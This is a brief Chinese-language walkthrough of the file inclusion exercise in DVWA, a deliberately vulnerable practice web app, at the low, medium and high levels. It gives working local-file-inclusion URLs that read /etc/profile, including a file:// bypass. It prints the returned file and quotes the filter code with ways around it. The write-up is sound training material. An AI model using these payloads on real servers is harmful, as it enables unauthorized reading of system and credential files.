DVWA - File Inclusion (low, medium, high)

low

观察URL可发现，注入点在page，low等级直接注入

http://192.168.67.22/dvwa/vulnerabilities/fi/?page=/etc/profile

返回结果如下：

# /etc/profile: system-wide .profile file for the Bourne shell (sh(1)) # and Bourne compatible shells (bash(1), ksh(1), ash(1), ...). if [ "$PS1" ]; then if [ "$BASH" ] && [ "$BASH" != "/bin/sh" ]; then # The file bash.bashrc already sets the default PS1. # PS1='\h:\w\$ ' if [ -f /etc/bash.bashrc ]; then . /etc/bash.bashrc fi else if [ "`id -u`" -eq 0 ]; then PS1='# ' else PS1='$ ' fi fi fi if [ -d /etc/profile.d ]; then for i in /etc/profile.d/*.sh; do if [ -r $i ]; then . $i fi done unset i fi export JAVA_HOME=/opt/jdk1.8.0_25 export CLASS_PATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar export PATH=$PATH:$JAVA_HOME/bin

medium

查看源码，发现以黑名单的方式过滤（删掉）了http://, https://, ../和..\

// Input validation $file = str_replace( array( "http://", "https://" ), "", $file ); $file = str_replace( array( "../", "..\"" ), "", $file );

绕过思路http转大写，使用绝对路径等等。

high

查看源码，发现以白名单的方式允许file开头的文件和include.php

// Input validation if( !fnmatch( "file*", $file ) && $file != "include.php" )

绕过思路，以file://协议读取文件即可，注入代码如下：

http://192.168.67.22/dvwa/vulnerabilities/fi/?page=file:///etc/profile